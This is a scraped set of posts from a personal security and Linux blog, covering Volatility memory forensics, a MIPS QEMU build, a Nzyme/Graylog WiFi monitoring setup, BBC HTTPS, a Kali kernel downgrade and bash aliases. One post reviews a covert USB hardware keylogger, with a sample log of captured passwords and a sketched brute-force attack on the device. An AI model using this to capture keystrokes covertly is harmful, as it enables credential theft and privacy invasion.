We can start our analysis with Volatility.\nAn example command using options -f memory file, --profile profile name and linux_banner plugin would look something like this:\npython vol.py -f debian-latest.lime --profile=LinuxDebian4908x64 linux_banner Tested Plugins The following is a list of working plugins under our profile.\nlinux_arp - Print the ARP table linux_aslr_shift - Automatically detect the Linux ASLR shift linux_banner - Prints the Linux banner information linux_bash - Recover bash history from bash process memory linux_bash_env - Recover a process\u0026#39; dynamic environment variables linux_bash_hash - Recover bash hash table from bash process memory linux_check_fop - Check file operation structures for rootkit modifications linux_check_idt - Checks if the IDT has been altered linux_check_modules - Compares module list to sysfs info, if available linux_check_tty - Checks tty devices for hooks linux_cpuinfo - Prints info about each active processor linux_dmesg - Gather dmesg buffer linux_dump_map - Writes selected memory mappings to disk linux_dynamic_env - Recover a process\u0026#39; dynamic environment variables linux_elfs - Find ELF binaries in process mappings linux_enumerate_files - Lists files referenced by the filesystem cache linux_find_file - Lists and recovers files from memory linux_getcwd - Lists current working directory of each process linux_hidden_modules - Carves memory to find hidden kernel modules linux_ifconfig - Gathers active interfaces linux_info_regs - It\u0026#39;s like \u0026#39;info registers\u0026#39; in GDB. 
It prints out all the linux_iomem - Provides output similar to /proc/iomem linux_kaslr_shift - Automatically detect KASLR physical/virtual shifts and alternate DTBs linux_kernel_opened_files - Lists files that are opened from within the kernel linux_keyboard_notifiers - Parses the keyboard notifier call chain linux_ldrmodules - Compares the output of proc maps with the list of libraries from libdl linux_library_list - Lists libraries loaded into a process linux_librarydump - Dumps shared libraries in process memory to disk linux_list_raw - List applications with promiscuous sockets linux_lsmod - Gather loaded kernel modules linux_lsof - Lists file descriptors and their path linux_malfind - Looks for suspicious process mappings linux_memmap - Dumps the memory map for linux tasks linux_moddump - Extract loaded kernel modules linux_mount - Gather mounted fs/devices linux_netfilter - Lists Netfilter hooks linux_netscan - Carves for network connection structures linux_netstat - Lists open sockets linux_pidhashtable - Enumerates processes through the PID hash table linux_pkt_queues - Writes per-process packet queues out to disk linux_plthook - Scan ELF binaries\u0026#39; PLT for hooks to non-NEEDED images linux_proc_maps - Gathers process memory maps linux_proc_maps_rb - Gathers process maps for linux through the mappings red-black tree linux_procdump - Dumps a process\u0026#39;s executable image to disk linux_process_hollow - Checks for signs of process hollowing linux_psaux - Gathers processes along with full command line and start time linux_psenv - Gathers processes along with their static environment variables linux_pslist - Gather active tasks by walking the task_struct-\u0026gt;task list linux_psscan - Scan physical memory for processes linux_pstree - Shows the parent/child relationship between processes linux_strings - Match physical offsets to virtual addresses (may take a while, VERY verbose) linux_threads - Prints threads of processes linux_tmpfs - Recovers 
tmpfs filesystems from memory linux_volshell - Shell in the memory image Example Output Caveats There may be issues with targets running unusual kernel versions or those that use additional SDKs. Not to mention further issues with KASLR on newer Linux kernels.\nReading Material Linux Memory Extractor Documentation Volatility Wiki KASLR and Volatility ","permalink":"https://markuta.com/live-memory-acquisition-on-linux-systems/","title":"Live Memory Acquisition on Linux Systems"},{"categories":null,"contents":"Update (2021) Debian ended support for MIPS big endian, and as a result some links broke. I have updated the links, and you can still follow this tutorial for MIPS little endian.\nHow to set up and build your own MIPS big endian or little endian image running under the QEMU emulator. This guide can also be applied to other architectures. For example, I\u0026rsquo;m currently running this in a virtual machine inside another virtual machine on my MacBook Pro. \u0026ldquo;We Need To Go Deeper\u0026rdquo; - Dom Cobb, Inception.\nInstall Package Since we are only emulating a MIPS system on QEMU, we only require one specific package, namely qemu-system-mips. On most Linux distros you can simply install it through apt-get. This will also install further packages required by QEMU:\n$ sudo apt-get install qemu-system-mips The exact version used: QEMU emulator version 2.8.1 (Debian 1:2.8+dfsg-6+deb9u3).\nDownload files There are two versions of the MIPS-32 (big endian or little endian) images: Malta and Octeon. This guide will be using the Malta version, although it\u0026rsquo;s almost the exact same process for Octeon, with a few minor option differences. I have updated the links below to reflect the changes.\nThe kernel filename may differ from the one listed below. As the Debian team provides newer releases and updates, the filename will change over time.
Link to Latest Stable.\nDownload both the installer and boot files from stable release:\nInstaller (initrd.gz) ~21MB: $ wget https://ftp.debian.org/debian/dists/stable/main/installer-mipsel/current/images/malta/netboot/initrd.gz Kernel boot (vmlinuz-5.10.0-8-4kc-malta) ~11MB: $ wget https://ftp.debian.org/debian/dists/stable/main/installer-mipsel/current/images/malta/netboot/vmlinuz-5.10.0-8-4kc-malta	Optional: Verify downloaded files with SHA256SUMS by manually comparing the hash values: $ shasum -a 256 initrd.gz vmlinuz-5.10.0-8-4kc-malta	15376785c6146daf17b225e475b15c329e274e9cd91df3300d96dcf5aa334158 initrd.gz c0e7e76ce2c12451ef63e5dfecdd577c3de84ef013f643e5addc01d7d79e6a45 vmlinuz-5.10.0-8-4kc-malta	Create a QEMU image file Create a QEMU image file specifying its storage size and filetype to be used as installation media. The table below shows the minimal hardware requirements as per the official Debian documentation: Link\nInstall Type | Minimum (RAM) | Recommended (RAM) | Storage No Desktop | 128MB | 512MB | 2GB Desktop | 256MB | 1GB | 10GB\nCreate a qcow2 format image with 2G of storage:\n$ qemu-img create -f qcow2 hda.img 2G Install Debian MIPS Before starting, make sure all three files (hda.img, vmlinuz-5.10.0-8-4kc-malta and initrd.gz) are actually in the current working directory. The installation process is almost identical to the standard x86_64 or i386 architectures.\nTo start the installation type:\n$ qemu-system-mips -M malta \ -m 256 -hda hda.img \ -kernel vmlinuz-5.10.0-8-4kc-malta \ -initrd initrd.gz \ -append \u0026#34;console=ttyS0 nokaslr\u0026#34; \ -nographic By default QEMU enables a NATed network interface for Internet connectivity through the host\u0026rsquo;s network. This allows the virtual machine to install and update packages.\nInstall SSH server I highly recommend installing an SSH server so you can communicate with the host machine for uploading and downloading files whilst in a NATed network.
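If you skipped the SSH server task in the installer, it can be added from inside the guest afterwards. A minimal sketch, assuming a Debian guest with the default NAT networking; the package and service names are standard Debian/OpenSSH, but treat the root-login tweak as a lab-only convenience:

```shell
# inside the guest: install and enable the OpenSSH server
sudo apt-get update
sudo apt-get install -y openssh-server
sudo systemctl enable --now ssh
# optional: permit root logins with a password (fine for a throwaway
# test image, not recommended anywhere else)
echo 'PermitRootLogin yes' | sudo tee -a /etc/ssh/sshd_config
sudo systemctl restart ssh
```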
The writer has yet to explore network bridging and other network connectivity. This will probably be the next post.\nInstallation Completed Once you see this screen your installation has completed and it\u0026rsquo;s time to shut down. Unfortunately, if you hit Continue, QEMU will reboot right back into the installer. Therefore you\u0026rsquo;d either want to kill the process or enter a CLI shell by selecting Go Back \u0026gt; Go Down \u0026gt; Execute Shell and type the poweroff command to shut down the virtual machine.\nCopy over Kernel initrd.img file During the installation stage you\u0026rsquo;ll see this screen warning us that no bootloader has been installed.\nBefore you can use the freshly installed MIPS image you first need to extract the kernel initrd.img-[version] file found in the /boot partition of the image. We must manually copy it by mounting the image and executing a few commands.\nMount the boot partition of the image file: sudo modprobe nbd max_part=63 sudo qemu-nbd -c /dev/nbd0 hda.img sudo mount /dev/nbd0p1 /mnt Copy a single file or the entire folder to the current directory: cp -r /mnt/boot/initrd.img-5.10.0-8-4kc-malta . # copy only initrd.img file cp -r /mnt/boot . # copy the entire boot folder Unmount the image: sudo umount /mnt sudo qemu-nbd -d /dev/nbd0 Running the QEMU image Now that all the files have been configured and set up, it\u0026rsquo;s time to officially start the virtual machine. The following set of options can be changed to your liking.
You could also make the following into a Bash script.\nTo start the image type:\n$ qemu-system-mips -M malta \ -m 256 -hda hda.img \ -kernel vmlinuz-5.10.0-8-4kc-malta \ -initrd initrd.img-5.10.0-8-4kc-malta \ -append \u0026#34;root=/dev/sda1 console=ttyS0 nokaslr\u0026#34; \ -nographic \ -device e1000-82545em,netdev=user.0 \ -netdev user,id=user.0,hostfwd=tcp::5555-:22 The last option enables port forwarding from host machine port 5555 to guest machine port 22 for SSH communication.\nTo upload a file to the guest machine from the host machine:\n$ scp -P 5555 file.txt root@localhost:/tmp Or to connect via ssh:\n$ ssh root@localhost -p 5555 The result Thanks A few other resources that were very helpful:\nQEMU - Debian Wiki Building a Debian Stretch QEMU image for MIPSel - Blah Cats Pre-configured Debian Squeeze and Wheezy images OpenWrt in QEMU - OpenWrt Wiki Debian on an emulated MIPS(EL) machine ","permalink":"https://markuta.com/how-to-build-a-mips-qemu-image-on-debian/","title":"How to build a Debian MIPS image on QEMU"},{"categories":null,"contents":"This guide shows you how to quickly set up and get started with Nzyme and Graylog version 2.3.2 using Docker. In this tutorial I\u0026rsquo;m using Mac OS, but Docker can be installed on any platform. For testing purposes, I\u0026rsquo;d recommend using Kali Linux or any Debian-based distro for the machine where the Nzyme sensor is installed.\nWhat is it? Nzyme collects 802.11 management frames directly from the air and sends them to a Graylog (Open Source log management) setup for WiFi IDS, monitoring, and incident response. It only needs a JVM and a WiFi adapter that supports monitor mode. Way more information is available on wtf.horse and GitHub.\nIn a real-world scenario users would want to use an additional WWAN or LTE network interface for when a LAN isn\u0026rsquo;t reachable or available.
Below is a simple network diagram with two devices running Nzyme, both of which have a number of network interfaces for collecting wireless traffic and communicating back to the centralised server.\nThis is how I would picture a simple network architecture:\nOverview A review of the necessary steps. This guide can be applied to any operating system running the Docker software.\nInstalling Docker and using a docker-compose.yml configuration file that contains defined services (Graylog, MongoDB, ElasticSearch), networks and volumes. Setting up a new GELF input through the Graylog web interface. Setting up and deploying a Nzyme sensor. Docker Docker provides containers and images that make it really easy to install and configure a Graylog server. MongoDB and ElasticSearch are both required by Graylog. Rather than installing them by hand we can define them in our docker-compose.yml file. It\u0026rsquo;s also important to use the right software version, as Graylog is picky about which versions are used.
Without specifying the version, it\u0026rsquo;ll use the latest which in some cases isn\u0026rsquo;t a good idea.\nDownload and install docker: https://www.docker.com\nA quick note on software versions:\nMongoDB 3.0.15 ElasticSearch 5.5.2 Graylog 2.3.2 Network ports:\n514 - Syslog UDP/TCP 9000 - Graylog Web Interface 12201 - GELF TCP/UDP Docker-Compose file version: \u0026#39;2\u0026#39; services: # MongoDB: https://hub.docker.com/_/mongo/ mongo: image: mongo:3 # Persistent Logs volumes: - mongo_data:/data/db # Elasticsearch: https://www.elastic.co/guide/en/elasticsearch/reference/5.5/docker.html elasticsearch: image: docker.elastic.co/elasticsearch/elasticsearch:5.5.2 # Persistent Logs volumes: - es_data:/usr/share/elasticsearch/data environment: - http.host=0.0.0.0 # Disable X-Pack security: https://www.elastic.co/guide/en/elasticsearch/reference/5.5/security-settings.html#general-security-settings - xpack.security.enabled=false - \u0026#34;ES_JAVA_OPTS=-Xms512m -Xmx512m\u0026#34; ulimits: memlock: soft: -1 hard: -1 mem_limit: 1g # Graylog: https://hub.docker.com/r/graylog/graylog/ graylog: image: graylog/graylog:2.3.2-1 # Persistent Logs volumes: - graylog_journal:/usr/share/graylog/data/journal environment: # CHANGE ME! - GRAYLOG_PASSWORD_SECRET=somepasswordpepper # Password: admin - GRAYLOG_ROOT_PASSWORD_SHA2=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 - GRAYLOG_WEB_ENDPOINT_URI=http://127.0.0.1:9000/api links: - mongo - elasticsearch ports: # Graylog web interface and REST API - 9000:9000 # Syslog TCP - 514:514 # Syslog UDP - 514:514/udp # GELF TCP - 12201:12201 # GELF UDP - 12201:12201/udp # Volumes for persisting data, see https://docs.docker.com/engine/admin/volumes/volumes/ volumes: mongo_data: driver: local es_data: driver: local graylog_journal: driver: local Start container Simply save the above docker-compose.yml file to your Containers directory and type in a terminal: docker-compose up. 
This may take a bit of time as Docker downloads and installs the containers for the first time. Once completed, you can check from another tab with: docker container list.\nGraylog Web Interface Once Docker has finished loading, you can access the Graylog Web Interface. By default the server listens on port 9000, which is accessible both through the localhost address and your system\u0026rsquo;s LAN IP address.\nDefault Web Interface Username and Password: admin:admin\nTo add a new GELF input simply navigate to: System \u0026gt; Inputs. As shown:\nAnd from the drop-down menu select GELF TCP and hit Launch new input. You\u0026rsquo;ll then be asked to enter a title. More options are available, like enabling TLS for transmitting logs securely; however, since this is a quick guide it won\u0026rsquo;t be required.\nConnection Test Before continuing it\u0026rsquo;s a good idea to test whether the newly created input is actually accepting our entries. To do this you could run netcat from a terminal:\necho -n -e \u0026#39;{ \u0026#34;version\u0026#34;: \u0026#34;1.1\u0026#34;, \u0026#34;host\u0026#34;: \u0026#34;markuta.com\u0026#34;, \u0026#34;short_message\u0026#34;: \u0026#34;A short message\u0026#34;, \u0026#34;level\u0026#34;: 5, \u0026#34;_some_info\u0026#34;: \u0026#34;foo\u0026#34; }\u0026#39;\u0026#34;\0\u0026#34; | nc -w1 127.0.0.1 12201 There should now be a new entry in http://127.0.0.1:9000/sources.\nA more realistic approach would be doing the same test from another computer on the same network; simply change the IP address to your current system\u0026rsquo;s (where Docker is installed) address. Be sure to allow or disable firewall rules on TCP port 12201. On Mac OS, for instance, the firewall will block incoming connections.\nNzyme Now that our centralised Graylog server is ready, it\u0026rsquo;s time to set up Nzyme. Nzyme runs on Java and thus requires a Java Runtime Environment.
Both the OpenJDK and Oracle JDK versions of Java 7 or 8 work well.\nCheck whether Java is installed: java -version\nTo install OpenJDK Java 8: sudo apt-get install openjdk-8-jdk\nDownload and Install Download the most recent build from the Releases page. At the time of writing the latest version was v0.2. The use of the deb package for Raspberry Pi or other Debian-based distributions is strongly encouraged. However, the Jar file should work fine too.\nInstall the package with the dpkg tool: sudo dpkg -i nzyme-0.2.deb\nOnce installed, the package creates multiple files and directories:\n/etc/nzyme/ - configurations with an automatically generated sample /var/log/nzyme/nzyme.log - a log file for info/error information. /usr/share/nzyme/ - contains the actual Jar file and symlinks An example nzyme.conf file:\n# A name for this nzyme-instance. nzyme_id = nzyme-sensor-1 # WiFi interface and 802.11 channels to use. Nzyme will cycle your network adapters through these channels. # Consider local legal requirements and regulations. Default is US 2.4GHz band. # Configure one or more interfaces here. # See also: https://en.wikipedia.org/wiki/List_of_WLAN_channels channels = wlan0:1,2,3,4,5,6,7,8,9,10,11,12,13,36,40,44,48 # There is no way for nzyme to configure your wifi interface directly. We are using direct operating system commands to # configure the adapter. Examples for Linux and OSX are in the README. channel_hop_command = sudo /sbin/iwconfig {interface} channel {channel} # Channel hop interval in seconds. Leave at default if you don\u0026#39;t know what this is. channel_hop_interval = 1 # List of Graylog GELF TCP inputs. You can send to multiple, comma separated, Graylog servers if you want. graylog_addresses = 192.168.1.113:12201 # There are a lot of beacon frames in the air. A sampling rate of, for example, 20, will ignore 19 beacons # and only send every 20th to Graylog. Use this to reduce traffic. Set to 0 to disable sampling.
beacon_frame_sampling_rate = 0 All that needs to be changed is the interface device, if you\u0026rsquo;re using something other than wlan0, and graylog_addresses, which corresponds to the Graylog server address. You can also change channels to suit your country\u0026rsquo;s regulatory standards. The channels will hop on both 2.4GHz and 5GHz frequencies.\nTo start, stop, or check the status of the service:\nsudo systemctl start nzyme sudo systemctl stop nzyme sudo systemctl status nzyme To enable the service to start automatically on boot: sudo systemctl enable nzyme\nSample Output Example of Graylog running for :\nNotes When navigating through the Graylog Web Interface, there may be some warning messages: \u0026ldquo;Could not update field graph data\u0026rdquo; or \u0026ldquo;Updating field graph data failed\u0026rdquo;. I think those are down to the ElasticSearch configuration, which others have also experienced: community.graylog.org. You could change the update rate to every 30 minutes.\nA big thanks to Lennart Koopmann for creating and sharing this useful wireless tool.\n","permalink":"https://markuta.com/how-to-set-up-nzyme-and-graylog/","title":"How to Set up Nzyme and Graylog"},{"categories":null,"contents":"Since last April in 2016, the main BBC Homepage has been accessible only via HTTPS, which I thought was a good step forward, heading in the right direction. However, most pages or URLs still use insecure HTTP.
Trying to navigate to a page while manually typing HTTPS in the browser address bar will force a 301 redirect to HTTP.\nHere\u0026rsquo;s an example of cURL while navigating to the /news/ path:\n$ curl -IL https://www.bbc.co.uk/news/technology HTTP/1.1 301 Moved Permanently Content-Type: text/html Date: Sun, 19 Nov 2017 22:53:22 GMT Location: http://www.bbc.co.uk/news/technology Connection: Keep-Alive Content-Length: 0 HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 X-News-Data-Centre: telhc Content-Language: en-GB X-PAL-Host: pal193.back.live.telhc.local:80 X-News-Cache-Id: 19441 Content-Length: 212175 Date: Sun, 19 Nov 2017 22:53:23 GMT Connection: keep-alive Set-Cookie: BBC-UID=c50curl/7.56.0; expires=Thu, 18-Nov-21 22:53:23 GMT; path=/; domain=.bbc.co.uk Cache-Control: private, max-age=30, stale-while-revalidate X-Cache-Action: MISS X-Cache-Age: 0 X-LB-NoCache: true Vary: X-CDN,X-BBC-Edge-Cache,Accept-Encoding The /news/ path and Homepage are probably the most visited in terms of network traffic compared to other aspects of the site, linked from various external sources (social media, news outlets, companies). It is strange that they enabled HTTPS on their Homepage and not everywhere else. It would have been a good idea to create a beta version of the news site for users to participate in, one which only allowed secure connections, so that they could fine-tune server configurations and learn from the data being collected.\nMore information is available from the BBC\u0026rsquo;s Internet blog. An interesting post by Lead Technical Architect, Paul Tweedy, entitled: Enabling Secure HTTP for BBC Online (July, 2016).\nIt goes on to state the progress being made and also the challenges faced for such a large website.\nTechnical \u0026amp; contractual changes to CDN (Content Delivery Network) partners.
Impact of additional TLS encryption on CPU load and other computer resources Internal software changes (back-end development) Device support; Smart TV, iPlayer, Mobile, etc\u0026hellip; One user comments about the recent \u0026ldquo;Travel News\u0026rdquo; in the article:\nThere\u0026rsquo;s a slight irony of implementing HTTPS on the travel site when the proposed closure of that section of the BBC website was announced a few months ago. - Keith\nIt has been over 16 months since that article was posted by Paul Tweedy. We\u0026rsquo;re almost in 2018 and one of the most visited parts of the BBC Online site still forces users to use insecure HTTP.\nRelated news Hacker News: How the BBC News website has changed over the past 20 years (November, 2017)\n","permalink":"https://markuta.com/https-for-news-on-bbc-online/","title":"Enable HTTPS for News on BBC Online"},{"categories":null,"contents":"Whilst studying at university I became interested in hardware keyloggers, and so decided to purchase one for a research paper. This device is specifically for wired USB keyboards (not Wi-Fi or Bluetooth) and records every single keystroke typed, without the need for drivers or worrying about any security product. I thought why not write a review and share some interesting findings.\nI DO NOT condone or encourage the use of any such devices for ILLEGAL purposes.\nFor those of you who are thinking - Why would you connect it to a laptop? - I currently do not have a tower computer, so I decided to use what I had available: my laptop and a Logitech USB keyboard. No disassembly or reverse engineering was attempted at this time.\nThe Device The KeyGrabber Nano keylogger device is the smallest USB hardware keylogger available on the market. The Nano, as the name suggests, has dimensions of just 35mm (L) x 20mm (H) x 12mm (W). There are two versions; one with Wi-Fi and the other without Wi-Fi.
This review is based on the non-Wi-Fi edition, which is currently available from the US for $55.99 or the EU for €51.99. Prices may vary in other locations due to shipping and packaging. The companies that sell it are called \u0026lsquo;KeeLog\u0026rsquo; in the EU and \u0026lsquo;Aqua Electronics Inc\u0026rsquo; in the US.\nMost typical hardware keyloggers are somewhat noticeable and rather bulky, even though they\u0026rsquo;re often out of sight and fitted to the back of systems. With a quick glance those can be seen from a mile away.\nHere\u0026rsquo;s the device compared to a British Five Pence Coin:\nFeatures Compact and Discrete Memory capacity (16 MB) flash file system Compatible with all USB keyboards (including Linux \u0026amp; Mac) Transparent to computer operation, undetectable for security scanners No software or drivers required and operating system independent Memory protected with strong 128-bit encryption Quick and easy national keyboard layout support Support The device supports most wired USB keyboards, including backlit and non-backlit models, with power ratings 4.5V – 5.5V DC (from the USB port). As this is a hardware keylogger it works on all operating systems (Windows, Mac OS, Linux) with no issues. I\u0026rsquo;ve tested USB versions 2.0 and 3.0, which work perfectly. Here\u0026rsquo;s an example of my Logitech K740 illuminated keyboard (power rating 5V, 300mA) connected to a Debian system, both with and without the device.\nOutput of dmesg:\nWith device on USB 3.0 port ...
[ 144.384517] usb 1-1: new full-speed USB device number 6 using xhci_hcd [ 144.531879] usb 1-1: New USB device found, idVendor=046d, idProduct=c318 [ 144.531893] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=0 [ 144.531903] usb 1-1: Product: Logitech Illuminated Keyboard [ 144.531912] usb 1-1: Manufacturer: Logitech [ 146.694372] input: Logitech Logitech Illuminated Keyboard as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1:1.0/0003:046D:C318.0001/input/input12 [ 146.752576] hid-generic 0003:046D:C318.0001: input,hidraw0: USB HID v1.11 Keyboard [Logitech Logitech Illuminated Keyboard] on usb-0000:00:14.0-1/input0 [ 146.753391] input: Logitech Logitech Illuminated Keyboard as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1:1.1/0003:046D:C318.0002/input/input13 [ 146.812373] hid-generic 0003:046D:C318.0002: input,hiddev0,hidraw1: USB HID v1.11 Device [Logitech Logitech Illuminated Keyboard] on usb-0000:00:14.0-1/input1 ... Without device on USB 3.0 port ... [ 392.120268] usb 1-1: new full-speed USB device number 8 using xhci_hcd [ 392.266333] usb 1-1: New USB device found, idVendor=046d, idProduct=c318 [ 392.266347] usb 1-1: New USB device strings: Mfr=1, Product=2, SerialNumber=0 [ 392.266357] usb 1-1: Product: Logitech Illuminated Keyboard [ 392.266365] usb 1-1: Manufacturer: Logitech [ 392.274911] input: Logitech Logitech Illuminated Keyboard as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1:1.0/0003:046D:C318.0003/input/input14 [ 392.334189] hid-generic 0003:046D:C318.0003: input,hidraw0: USB HID v1.11 Keyboard [Logitech Logitech Illuminated Keyboard] on usb-0000:00:14.0-1/input0 [ 392.339795] input: Logitech Logitech Illuminated Keyboard as /devices/pci0000:00/0000:00:14.0/usb1/1-1/1-1:1.1/0003:046D:C318.0004/input/input15 [ 392.397846] hid-generic 0003:046D:C318.0004: input,hiddev0,hidraw1: USB HID v1.11 Device [Logitech Logitech Illuminated Keyboard] on usb-0000:00:14.0-1/input1 ... 
As you can tell it\u0026rsquo;s completely transparent to the OS.\nDifferent Keyboard Layouts There are a total of 48 different national keyboard layouts supported. This is an important aspect if you\u0026rsquo;re considering using the device in different countries. The layouts ensure each keystroke is processed and stored correctly. This option is not enabled by default, but can be easily changed by updating the configuration file to match a chosen keyboard layout.\nBelow is a list of all supported languages and layouts:\nEach folder contains a file called layout.usb which is placed onto the root of the USB. In addition, the configuration file needs to be updated with the setting: DisableLayout=No. The full and updated list can be downloaded from here.\nConfiguration The device can be configured through the config.txt file located on the root of the USB. Data Storage mode must be activated to either view or edit the files. The most relevant parameters are listed below:\nParameter | Values | Example | Description Password | 3-character password (default KBS) | Password=SVL | Three-character key combination for activating Flash Drive mode. Encryption | Yes, No (default) | Encryption=No | Flash drive AES encryption LogSpecialKeys | None, Medium (default), Full | LogSpecialKeys=Full | Special key logging level. DisableLogging | Yes, No (default) | DisableLogging=Yes | Keystroke logging disable flag. DisableLayout | Yes, No (default) | DisableLayout=Yes | National layout disable flag.\nData Storage Mode The storage mode is activated when a 3-key combination is typed simultaneously on a connected USB keyboard. Once pressed, a new 16MB storage device entitled \u0026ldquo;KEYGRABBER\u0026rdquo; will pop up and the keyboard will stop functioning unless it\u0026rsquo;s reconnected. The default secret key combination is (K + B + S).
This can be changed to any 3 characters, provided they\u0026rsquo;re unique on a typical keyboard layout, by editing the Password parameter within the configuration file.\nExample output of log.txt (LogSpecialKeys set to Medium):\n[Pwr]example.com[Ent] news.ycombinator.com[Ent] [Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck][Bck]google.com[Ent] [Alt][Tab][Win][Tab][Win][Tab][Win][Tab][Win][Tab][Win][Tab][Win][Tab]example[Ent] sb[Pwr][Cap]g[Cap]reat for getting [Cap]bios p[Cap]asswords ()[Cap]*[Ent] [Ent]p$ssw0rd123%`[Ent] [Ent][Tab]qwertyuiop[][Ent] [Cap]asdfghjkl;\u0026#39;#[Ent] \zxcvbnm,./[Ent] [F6][F5][Esc][F11][F11]sb Encryption In addition to a secret key, there\u0026rsquo;s also an option to enable 128-bit AES encryption to \u0026ldquo;protect\u0026rdquo; against device tampering. However, it is let down by the password combination, as mentioned below. This option is disabled by default but can be enabled by editing the config.txt file and setting Encryption=Yes. Doing so will also re-format and purge logged data.\nDrawbacks Reading the log file may become confusing for non-technical users, because the device records raw keyboard entries, especially when the LogSpecialKeys=Full option is selected. The device does come with software called \u0026lsquo;KL Tools\u0026rsquo; which assists users in configuring and viewing recorded data through an intuitive GUI. However, others may prefer writing their own parsing scripts.\nEncryption option and password key. The biggest drawback is the 3-key secret password. For example, assuming a password uses [a-z] characters, that would leave a keyspace of only 26 x 25 x 24 = 15,600. The keys also need to be entered simultaneously. So, if the password is KBS, any permutation of it will activate storage mode, e.g. (SBK or BSK), lowering the keyspace even further.
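The keyspace arithmetic above can be checked quickly in a shell. Since any ordering of the three keys activates storage mode, the 3! = 6 orderings of each combination collapse into one:

```shell
# ordered 3-key passwords from a 26-letter set: 26 * 25 * 24
echo $((26 * 25 * 24))        # 15600
# any ordering works, so divide by 3! = 6 orderings per combination
echo $((26 * 25 * 24 / 6))    # 2600 distinct key combinations to try
```

At 2,600 candidates, even a slow automated attack exhausts the space in minutes.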
All it would take is a modified HID device connected to the keylogger to perform a simple dictionary attack, regardless of whether the encryption option is enabled or not.\nWhile a USB keyboard is attached, part of the USB male connector is exposed (as shown in the first photograph). It would\u0026rsquo;ve been much cleaner if it had a completely \u0026lsquo;flush\u0026rsquo; finish.\nSummary The main advantages are its size and support for multinational keyboard layouts. I really do like the unique storage mode activation by way of a 3-key password combination. However, it would\u0026rsquo;ve been a much better solution to allow a longer password entered in sequence, recognised as a pattern before entering storage mode. Although I don\u0026rsquo;t think there\u0026rsquo;s much information to be obtained for any investigative purposes, possibly file metadata, regardless it\u0026rsquo;s an issue a user should be aware of if the device were to be found.\nThe KeyGrabber Nano is no doubt an interesting device that I\u0026rsquo;ve had much fun playing around with. If you are seeking a small covert USB keylogger device this would be my first choice. I really would\u0026rsquo;ve liked to try out the Wi-Fi version, if only the cost wasn\u0026rsquo;t so high. In a future post, I may show a brute-force attack against the device using a Rubber Ducky USB (HID).\n","permalink":"https://markuta.com/keygrabber-nano-usb-keylogger-review/","title":"KeyGrabber Nano USB Keylogger Review"},{"categories":null,"contents":"UPDATE: Kali Team have migrated to a new Kernel Version I\u0026rsquo;ve tested the new kernel 4.12.13-1kali2 and can confirm it fixes issues with my wireless card. I\u0026rsquo;d advise people to update their packages and use this kernel. I\u0026rsquo;ll keep this page as it\u0026rsquo;s still a useful guide on how to downgrade, falling back on another kernel.
More info available: https://pkg.kali.org/pkg/linux\nAs you may have heard, the recent 4.12.6-1kali1 kernel version broke functionality on most wireless devices, resulting in serious performance and range issues that make devices almost unusable. I also noticed my wireless card getting rather too warm for my liking.\nHere are some of the error messages in dmesg produced on the current kernel while in monitoring mode:\nThe range also drops dramatically, to where I couldn\u0026rsquo;t even monitor traffic 3 meters away from my access point.\nHow to Downgrade back to Kernel 4.11 Here is a quick way of installing the previous working kernel, linux 4.11.6-1kali1, that\u0026rsquo;ll resolve wireless device issues until a patch is released. The same version is used in the AWUS052NH card review.\nHead over to: https://http.kali.org/kali/pool/main/l/linux/\nFind 4.11.6-1kali1 and download it for your architecture; for example, for 64-bit Intel or AMD CPUs it would be: linux-image-4.11.0-kali1-amd64_4.11.6-1kali1_amd64.deb\nInstall the .deb package with dpkg: dpkg -i linux-image-4.11.0-kali1-amd64_4.11.6-1kali1_amd64.deb\nReboot the system.
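The download-and-install steps can be collected into a short script. A sketch, assuming the amd64 package named above and root privileges (Kali typically runs as root):

```shell
#!/bin/sh
# fetch and install the previous working kernel, then reboot into it
set -e
PKG=linux-image-4.11.0-kali1-amd64_4.11.6-1kali1_amd64.deb
wget "https://http.kali.org/kali/pool/main/l/linux/${PKG}"
dpkg -i "${PKG}"
reboot
```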
During the initial boot process select Advanced options from the GRUB menu and the kernel version we\u0026rsquo;ve just installed: After booting the wireless device should work as before the update.\n","permalink":"https://markuta.com/kali-linux-kernel-4-12-wireless-problems/","title":"Kali Linux Kernel 4.12 Wireless Problems"},{"categories":null,"contents":"Reload bash_profile Apply any changes made to ~/.bash_profile with reload: alias reload='source ~/.bash_profile'\nNetwork Connections List all network connections with nets: alias nets='lsof -i'\nInternet Speed test Speed test using a 100Mbyte file from OVH Hosting:\nalias speedtest=\u0026#39;curl -o /dev/null http://ovh.net/files/100Mio.dat\u0026#39; WAN IP Address Show WAN IP address with myip: alias myip='curl ifconfig.co'\nWeb Server Banner A curl function to grab web server banner information with headers followed by a URL:\nheaders () { /usr/bin/curl -X GET -I -L -k -A \u0026#39;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36\u0026#39; $@ ; } Website HTML Source A curl function to view a web page\u0026rsquo;s html source with view-source followed by a URL:\nview-source () { /usr/bin/curl -L -k -A \u0026#39;Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0\u0026#39; $@ ; } File Header View the first few bytes of any file with filehead followed by a filename:\nfilehead () { /usr/bin/xxd -u -g 1 $@ | /usr/bin/head ;} List and Directory alias cp=\u0026#39;cp -iv\u0026#39; alias mv=\u0026#39;mv -iv\u0026#39; alias mkdir=\u0026#39;mkdir -pv\u0026#39; alias ll=\u0026#39;ls -FGlAhp\u0026#39; alias less=\u0026#39;less -FSRXc\u0026#39; alias CD=\u0026#39;cd\u0026#39; alias cd..=\u0026#39;cd ../\u0026#39; alias ..=\u0026#39;cd ../\u0026#39; alias ...=\u0026#39;cd ../../\u0026#39; alias ....=\u0026#39;cd ../../../\u0026#39; alias .....=\u0026#39;cd ../../../../\u0026#39; alias ~=\u0026#39;cd ~\u0026#39; alias 
